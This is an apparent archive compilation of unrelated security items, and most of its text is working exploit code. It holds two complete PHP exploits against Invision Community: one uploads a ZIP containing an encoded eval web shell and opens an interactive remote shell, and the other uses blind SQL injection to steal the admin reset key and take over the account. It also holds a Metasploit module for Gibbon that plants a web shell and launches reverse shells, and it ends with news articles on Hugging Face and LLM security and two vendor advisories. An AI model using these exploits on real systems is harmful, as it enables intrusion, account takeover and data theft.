Invision Community versions 4.7.16 and below suffer from a remote code execution vulnerability in toolbar.php.

    ------------------------------------------------------------------------------Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability------------------------------------------------------------------------------[-] Software Link:https://invisioncommunity.com[-] Affected Versions:Version 4.7.16 and prior versions.[-] Vulnerability Description:The vulnerability is located in the/applications/core/modules/admin/editor/toolbar.php script.Specifically, into theIPS\core\modules\admin\editor\_toolbar::addPlugin() method, which willhandlethe upload of a ZIP file, trying to extract its content into the/applications/core/interface/ckeditor/ckeditor/plugins/ directory; ifthe ZIP archive does not includea plugin.js file, then the extracted ZIP content will be recursivelydeleted from the file system,otherwise it will stay there. This can be exploited to executearbitrary PHP code by uploading aZIP archive containing a plugin.js file (which can also be empty)along with a PHP file. Successfulexploitation of this vulnerability requires an Administrator accounthaving the "toolbar_manage" permission.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2024-30162.php[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed[20/03/2024] - CVE identifier requested[24/03/2024] - CVE identifier assigned[05/04/2024] - Coordinated public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2024-30162 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Other References:https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/[-] Original Advisory:http://karmainsecurity.com/KIS-2024-03-----------------------PoC:<?php/*    ------------------------------------------------------------------------------    Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability    ------------------------------------------------------------------------------    author..............: Egidio Romano aka EgiX    mail................: n0b0d13s[at]gmail[dot]com    software link.......: https://invisioncommunity.com    +-------------------------------------------------------------------------+    | This proof of concept code was written for educational purpose only.    |    | Use it at your own risk. Author will be not responsible for any damage. |    +-------------------------------------------------------------------------+    [-] Vulnerability Description:    The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.    Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will    handle the upload of a ZIP file, trying to extract its content into the    /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does    not include a plugin.js file, then the extracted ZIP content will be recursively deleted    from the file system, otherwise it will stay there. This can be exploited to execute    arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can    also be empty) along with a PHP file. Successful exploitation of this vulnerability    requires an Administrator account having the "toolbar_manage" permission.    [-] Original Advisory:    https://karmainsecurity.com/KIS-2024-03*/set_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[-] cURL extension required!\n");if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");$url = $argv[1];$email = $argv[2];$passwd = $argv[3];$ch = curl_init();@unlink('./cookies.txt');curl_setopt($ch, CURLOPT_HEADER, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');print "[+] Logging into AdminCP\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");print "[+] Uploading malicious ZIP file\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");$plg = md5(time()).".zip";@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];curl_setopt($ch, CURLOPT_POSTFIELDS, $params);if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");print "[+] Launching shell\n";curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");curl_setopt($ch, CURLOPT_POST, false);$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";while(1){  print "\ninvision-shell# ";  if (($cmd = trim(fgets(STDIN))) == "exit") break;  curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);  preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");}

Invision Community 4.7.16 Remote Code Execution

Invision Community versions 4.4.0 through 4.7.15 suffer from a remote SQL injection vulnerability in store.php.

--------------------------------------------------------------------  
Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
--------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

All versions from 4.4.0 to 4.7.15.

[-] Vulnerability Description:

The vulnerability is located in the  
/applications/nexus/modules/front/store/store.php script.  
Specifically, into the  
IPS\nexus\modules\front\store\_store::_categoryView() method:

126 /* Apply Filters */  
127 if ( isset( \IPS\Request::i()->filter ) and \is_array(  
\IPS\Request::i()->filter ) )  
128 {  
129 $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter );  
130 foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues )  
131 {  
132 $where[] = array( \IPS\Db::i()->findInSet(  
"filter{$filterId}.pfm_values", array_map( 'intval', explode( ',',  
$allowedValues ) ) ) );  
133 $joins[] = array( 'table' => array( 'nexus_package_filters_map',  
"filter{$filterId}" ), 'on' => array(  
"filter{$filterId}.pfm_package=p_id AND  
filter{$filterId}.pfm_filter=?", $filterId ) );  
134 }  
135 }

User input passed through the "filter" request parameter is not  
properly sanitized before being  
assigned to the $where and $joins variables (lines 132 and 133), which  
are later used to execute  
some SQL queries. This can be exploited by unauthenticated attackers  
to carry out time-based or  
error-based Blind SQL Injection attacks. Subsequently, this might also  
be exploited to reset  
users' passwords and gain unauthorized access to the AdminCP, in order  
to achieve  
Remote Code Execution (RCE). Successful exploitation of this  
vulnerability requires  
the nexus application to be installed and configured with one "Product  
Group" at least.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2024-30163.php

[-] Solution:

Upgrade to version 4.7.16 or later.

[-] Disclosure Timeline:

[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure  
[12/03/2024] - Version 4.7.16 released  
[20/03/2024] - CVE identifier requested  
[24/03/2024] - CVE identifier assigned  
[05/04/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2024-30163 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://invisioncommunity.com/release-notes/4716-r128/  
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-02

-----------------------  
PoC:

<?php

/*  
    --------------------------------------------------------------------  
    Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
    --------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://invisioncommunity.com

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    The vulnerability is located in the /applications/nexus/modules/front/store/store.php script.  
    Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: user  
    input passed through the "filter" request parameter is not properly sanitized before being  
    assigned to the $where and $joins variables, which are later used to execute some SQL  
    queries. This can be exploited by unauthenticated attackers to carry out time-based  
    or error-based SQL Injection attacks.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2024-02  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

$url = $argv[1];  
$ch  = curl_init();  
$sec = 3; // number of seconds for SLEEP(): less seconds, less accurate

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/");

function sql_injection($sql)  
{  
  global $ch, $sec;

  $min = true;  
  $idx = 1;

  while(1)  
  {  
    $test = 256;

    for ($i = 7; $i >= 0; $i--)  
    {  
      $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));  
      $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#";  
      curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection)));  
      $start = time(); curl_exec($ch); $secs = time() - $start;  
      $min = ($secs < $sec);  
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;  
    $data .= chr($chr); $min = true; $idx++;  
    print "\r[*] Data: {$data}";  
  }

  return $data;  
}

print "[+] Step 1: fetching admin's e-mail address\n";

$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");

print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";

fgets(STDIN);

print "[+] Step 3: fetching the password reset key\n";

$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");

print "\n[+] Step 4: taking over the admin account by resetting their password\n";

@unlink('./cookies.txt');

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");  
curl_setopt($ch, CURLOPT_POST, false);  
curl_setopt($ch, CURLOPT_HEADER, true);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

$passwd = md5(time());  
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";

curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");

print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n";

Invision Community 4.7.15 SQL Injection

By Deeba Ahmed
Wiz.io, known for its cloud security expertise, and Hugging Face, a leader in open-source AI tools, are combining their knowledge to develop solutions that address these security concerns. This collaboration signifies a growing focus on securing the foundation of AI advancements.
This is a post from HackRead.com Read the original post: Vulnerabilities Exposed Hugging Face to AI Supply Chain Attacks

Cybersecurity firm Wiz.io found that AI-as-a-service (aka AI Cloud) platforms like Hugging Face are vulnerable to critical risks, which allow threat actors to escalate privileges, gain cross-tenant access, and potentially take over continuous integration and continuous deployment (**CI/CD**) pipelines. 

**Understanding The Problem**

AI models require a strong GPU, often outsourced to AI service providers similar to consuming cloud infrastructure from AWS/GCP/Azure. **Hugging Face**’s service is called Hugging Face Inference API.

Wiz Research could compromise the service running custom models by uploading their malicious model and using container escape techniques, allowing cross-tenant access to other customers’ models stored in Hugging Face.

The platform supports various AI model formats, two prominent ones being **PyTorch** (Pickle) and Safetensors. Python’s Pickle format is known for being unsafe and allowing remote code execution upon deserialization of untrusted data although Hugging Face assesses Pickle files uploaded to their platform, highlighting those they deem dangerous.

However, researchers cloned a legitimate Pickle-based model (**gpt2**), modified it to run a reverse-shell upon loading, and uploaded the hand-crafted model as a private model. They interacted with the model using the Inference API feature, obtaining a reverse shell and discovered that crafting a PyTorch model that executes arbitrary code is straightforward, whereas uploading their model to Hugging Face allowed them to execute code inside the Inference API.

****Potential Risks****

The potential impact is devastating as attackers could access millions of private AI models and apps. Two critical risks include shared inference infrastructure takeover risk, where malicious models run untrusted inference infrastructure, and shared CI/CD takeover risk, where malicious AI applications may attempt to take over the pipeline and execute a supply chain attack after taking over the **CI/CD cluster**.

Furthermore, adversaries can attack AI models, **AI/ML applications**, and inference infrastructures using various methods. They can use inputs that cause false predictions, incorrect predictions, or malicious models. AI models are often treated as black-box and used in applications. However, there are few tools to verify the integrity of a model, so developers must be cautious when downloading them.

“Using an untrusted AI model could introduce integrity and security risks to your application and is equivalent to including untrusted code within your application” Wiz Research’s **report** explained.

****Hugging Face- Wiz Research Join Hands****

Open-source artificial intelligence (AI) hub Hugging Face and Wiz.io have collaborated to address the security risks associated with AI-powered services. The joint effort highlights the importance of proactive measures to ensure the responsible and secure development and deployment of AI technologies.

Commenting on this, **Nick Rago**, VP of Product Strategy at Salt Security added that _“_Securing the critical cloud infrastructure that houses AI models is crucial and the findings by Wiz are significant. It is also imperative that security teams recognize the vehicle in which AI is trained and serviced is an API, and rigorous security must be applied at that level to ensure the security of AI supply chains.”

****A Concerning Scenario****

This discovery comes at a time when concerns are already raised regarding data safety under AI-based tools. The AvePoint survey shows that less than half of organizations are confident they can use AI safely, with 71% concerned about data privacy and security before implementation, and 61% worried about internal data quality.

Despite the widespread use of AI tools like ChatGPT and Google Gemini, fewer than half have an AI Acceptable Use Policy. Additionally, 45% of organizations experienced unintended data exposure during AI implementation.

The widespread adoption of AI across various industries necessitates strong security measures. These vulnerabilities could potentially allow attackers to manipulate AI models, steal sensitive data, or disrupt critical operations.

1.  Airbus EFB App Vulnerability Risking Aircraft Data
2.  Vulnerability Exposed Ibis Budget Guest Room Codes
3.  CISA Urges Patching Microsoft SharePoint Vulnerability

Vulnerabilities Exposed Hugging Face to AI Supply Chain Attacks

A remote code execution vulnerability in Gibbon online school platform version 26.0.00 and lower allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the endpoint /modules/System%20Admin/import_run.php&type=externalAssessment&step=4. As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Gibbon School Platform Authenticated PHP Deserialization Vulnerability',        'Description' => %q{          A Remote Code Execution vulnerability in Gibbon online school platform version 26.0.00 and lower          allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a          POST request to the endpoint `/modules/System%20Admin/import_run.php&type=externalAssessment&step=4`.          As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,          potentially resulting in complete system compromise, data exfiltration, or unauthorized access          to sensitive information.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Ali Maharramli', # SecondX.io Research Team - discovery of the vulnerability          'Fikrat Guliev', # SecondX.io Research Team - discovery of the vulnerability          'Islam Rzayev' # SecondX.io Research Team - discovery of the vulnerability        ],        'References' => [          ['CVE', '2024-24725'],          ['URL', 'https://attackerkb.com/topics/ogKGAB44BP/cve-2024-24725'],          ['PACKETSTORM', '177635'],          ['EDB', '51903']        ],        'DisclosureDate' => '2024-03-18',        'Platform' => ['php', 'unix', 'linux', 'win'],        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'PHP',            {              'Platform' => ['php'],              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'curl', 'bourne', 'printf', 'echo'],              'Linemax' => 16384,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper,              'Linemax' => 16384,              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Gibbon online school platform endpoint URL', '/' ]),      OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]),      OptString.new('USERNAME', [true, 'Gibbon username to login, typically an e-mail address']),      OptString.new('PASSWORD', [true, 'Password'])    ])  end  def gibbon_login    # construct multipart login form data    form_data = Rex::MIME::Message.new    form_data.add_part('', nil, nil, 'form-data; name="address"')    form_data.add_part('default', nil, nil, 'form-data; name="method"')    form_data.add_part(datastore['USERNAME'].to_s, nil, nil, 'form-data; name="username"')    form_data.add_part(datastore['PASSWORD'].to_s, nil, nil, 'form-data; name="password"')    form_data.add_part('025', nil, nil, 'form-data; name="gibbonSchoolYearID"')    form_data.add_part('0002', nil, nil, 'form-data; name="gibboni18nID"')    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'login.php?timeout=true'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def construct_form_data(payload)    # construct multipart form data with payload    payload_len = payload.length    payload_data = "a:2:{i:7;O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:9:\"\x00*\x00socket\";O:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"\x00*\x00handler\";r:3;s:13:\"\x00*\x00bufferSize\";i:-1;s:9:\"\x00*\x00buffer\";a:1:{i:0;a:2:{i:0;s:#{payload_len}:\"#{payload}\";s:5:\"level\";N;}}s:8:\"\x00*\x00level\";N;s:14:\"\x00*\x00initialized\";b:1;s:14:\"\x00*\x00bufferLimit\";i:-1;s:13:\"\x00*\x00processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}i:7;i:7;}"    form_data = Rex::MIME::Message.new    form_data.add_part('/modules/System Admin/import_run.php', nil, nil, 'form-data; name="address"')    form_data.add_part('sync', nil, nil, 'form-data; name="mode"')    form_data.add_part('N', nil, nil, 'form-data; name="syncField"')    form_data.add_part('', nil, nil, 'form-data; name="syncColumn"')    form_data.add_part(payload_data.to_s, nil, nil, 'form-data; name="columnOrder"')    form_data.add_part('N;', nil, nil, 'form-data; name="columnText"')    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')    form_data.add_part("#{Rex::Text.rand_text_alpha(8..16)}.xlsx", nil, nil, 'form-data; name="filename"')    form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')    form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')    form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')    return form_data  end  def upload_webshell(b64_payload)    # randomize file name if option WEBSHELL is not set    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")    # create webshell with base64 encoded PHP payload    # works for both windows and linux targets    php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"    form_data = construct_form_data(php_payload)    # upload webshell    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    res = upload_webshell(payload)    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200    register_file_for_cleanup(@webshell_name)    # execute webshell    send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, @webshell_name),      'keep_cookies' => true    })  end  def execute_command(cmd, _opts = {})    form_data = construct_form_data(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })  end  def check    print_status("Checking if #{peer} can be exploited.")    res = send_request_cgi!({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path)    })    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200    # check if target is running the Gibbon online school platform    # search for the Gibbon version on the login page    return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')    # trying to get the version    version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)    version_number = version[0].split('v') unless version.nil?    if version_number      if Rex::Version.new(version_number[1]) <= Rex::Version.new('26.0.00')        return CheckCode::Appears("Gibbon v#{version_number[1]}")      else        return CheckCode::Safe("Gibbon v#{version_number[1]}")      end    end    CheckCode::Detected  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    res = gibbon_login    fail_with(Failure::NoAccess, "Login failed with user #{datastore['USERNAME']} and password #{datastore['PASSWORD']}.") unless res && res.code == 302    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd, :windows_cmd      execute_command(payload.encoded)    when :linux_dropper, :windows_dropper      # don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Gibbon School Platform 26.0.00 Remote Code Execution

Large language models require rethinking how to bake security into the software development process earlier.

Large language models require rethinking how to bake security into the software development process earlier.

Source: Chroma Craft Media Group via Alamy Stock Photo

Question: What do we really know about large language model (LLM) security? And are we willingly opening the front door to chaos by using LLMs in business?

Rob Gurzeev, CEO, CyCognito: Picture it: Your engineering team is harnessing the immense capabilities of LLMs to "write code" and rapidly develop an application. It's a game-changer for your businesses; development speeds are now orders of magnitude faster. You've shaved 30% off time-to-market. It's win-win — for your org, your stakeholders, your end users.

Six months later, your application is reported to leak customer data; it has been jailbroken and its code manipulated. You're now facing SEC violations and the threat of customers walking away.

Efficiency gains are enticing, but the risks cannot be ignored. While we have well-established standards for security in traditional software development, LLMs are black boxes that require rethinking how we bake in security.

**New Kinds of Security Risks for LLMs**

LLMs are rife with unknown risks and prone to attacks previously unseen in traditional software development.

*   Prompt injection attacks involve manipulating the model to generate unintended or harmful responses. Here, the attacker strategically formulates prompts to deceive the LLM, potentially bypassing security measures or ethical constraints put in place to ensure responsible use of the artificial intelligence (AI). As a result, the LLM's responses can deviate significantly from the intended or expected behavior, posing serious risks to privacy, security, and the reliability of AI-driven applications.
    
*   Insecure output handling arises when the output generated by an LLM or similar AI system is accepted and incorporated into a software application or Web service without undergoing adequate scrutiny or validation. This can expose back-end systems to vulnerabilities, such as cross-site scripting (XSS), cross-site request forgery (CSRF), server-side request forgery (SSRF), privilege escalation, and remote code execution (RCE).
    
*   Training data poisoning occurs when the data used to train an LLM is deliberately manipulated or contaminated with malicious or biased information. The process of training data poisoning typically involves the injection of deceptive, misleading, or harmful data points into the training dataset. These manipulated data instances are strategically chosen to exploit vulnerabilities in the model's learning algorithms or to instill biases that may lead to undesired outcomes in the model's predictions and responses.
    

**A Blueprint for Protection and Control of LLM Applications**

While some of this is new territory, there are best practices you can implement to limit exposure.

*   Input sanitization involves, as the name suggestion, the sanitization of inputs to prevent unauthorized actions and data requests initiated by malicious prompts. The first step is input validation to ensure input adheres to expected formats and data types. The next is input sanitization, where potentially harmful characters or code are removed or encoded to thwart attacks. Other tactics include whitelists of approved content, blacklists of forbidden content, parameterized queries for database interactions, content security policies, regular expressions, logging, and continuous monitoring, as well as security updates and testing.
    
*   Output scrutiny is the rigorous handling and evaluation of the output generated by the LLM to mitigate vulnerabilities, like XSS, CSRF, and RCE. The process begins by validating and filtering the LLM's responses before accepting them for presentation or further processing. It incorporates techniques such as content validation, output encoding, and output escaping, all of which aim to identify and neutralize potential security risks in the generated content.
    
*   Safeguarding training data is essential to prevent training data poisoning. This involves enforcing strict access controls, employing encryption for data protection, maintaining data backups and version control, implementing data validation and anonymization, establishing comprehensive logging and monitoring, conducting regular audits, and providing employee training on data security. It's also important to verify the reliability of data sources and ensure secure storage and transmission practices.
    
*   Enforcing strict sandboxing policies and access controls can also help mitigate the risk of SSRF exploits in LLM operations. Techniques that can be applied here include sandbox isolation, access controls, whitelisting and/or blacklisting, request validation, network segmentation, content-type validation, and content inspection. Regular updates, comprehensive logging, and employee training are also key.
    
*   Continuous monitoring and content filtering can be integrated into the LLM's processing pipeline to detect and prevent harmful or inappropriate content, using keyword-based filtering, contextual analysis, machine-learning models, and customizable filters. Ethical guidelines and human moderation play key roles in maintaining responsible content generation, while continuous real-time monitoring, user feedback loops, and transparency ensure that any deviations from desired behavior are promptly addressed.
    

**About the Author(s)**

Dark Reading

The Edge is Dark Reading's home for features, threat data and in-depth perspectives on cybersecurity.

You May Also Like

How Do We Integrate LLMs Security Into Application Development?

pgAdmin <= 8.4 is affected by a  Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.


**pgAdmin Remote Code Execution (RCE) vulnerability**

High severity GitHub Reviewed Published Apr 4, 2024 to the GitHub Advisory Database • Updated Apr 4, 2024

GHSA-27jx-ffw8-xrqv: pgAdmin Remote Code Execution (RCE) vulnerability

Red Hat Security Advisory 2024-1614-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Issues addressed include code execution, null pointer, privilege escalation, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1614.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel-rt security and bug fix update  
Advisory ID:        RHSA-2024:1614-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1614  
Issue date:         2024-04-03  
Revision:           03  
CVE Names:          CVE-2021-33631  
====================================================================

Summary: 

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)

* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)

* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)

* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)

* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)

* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)

Bug Fix(es):

* kernel-rt: update RT source tree to the latest RHEL-8.9.z3 Batch (JIRA:RHEL-23853)

